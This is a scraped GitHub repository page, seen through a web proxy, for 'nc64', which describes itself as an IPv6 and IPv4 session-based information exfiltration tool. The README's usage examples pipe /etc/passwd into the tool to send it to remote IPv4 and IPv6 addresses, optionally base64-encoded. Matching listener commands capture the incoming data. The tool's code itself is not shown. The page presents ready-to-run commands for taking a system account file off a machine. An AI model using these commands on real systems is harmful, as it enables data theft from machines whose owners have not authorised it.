8000 GitHub - lockout/nc64: IPv6 and IPv4 session based information exfiltration tool
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

lockout/nc64

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

33 Commits
 
 
 
 
 
 

Repository files navigation

nc64

IPv6 and IPv4 session based information exfiltration tool

Examples:

cat /etc/passwd | python3 nc64.py -h4 192.168.10.10 -h6 2a02:1010:12aa::11

python3 nc64.py -l > out

cat /etc/passwd | python3 nc64.py -i wlan0 -p 4444 -h4 192.168.10.10 -h6 2a02:1010:12aa::11

python3 nc64.py -l -i eth1 -p 4444 > out

cat /etc/passwd | python3 nc64.py -h4 192.168.10.10 -h6 2a02:1010:12aa::11 -b64 -T

python3 nc64.py -l -b64 > out

About

IPv6 and IPv4 session based information exfiltration tool

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages

0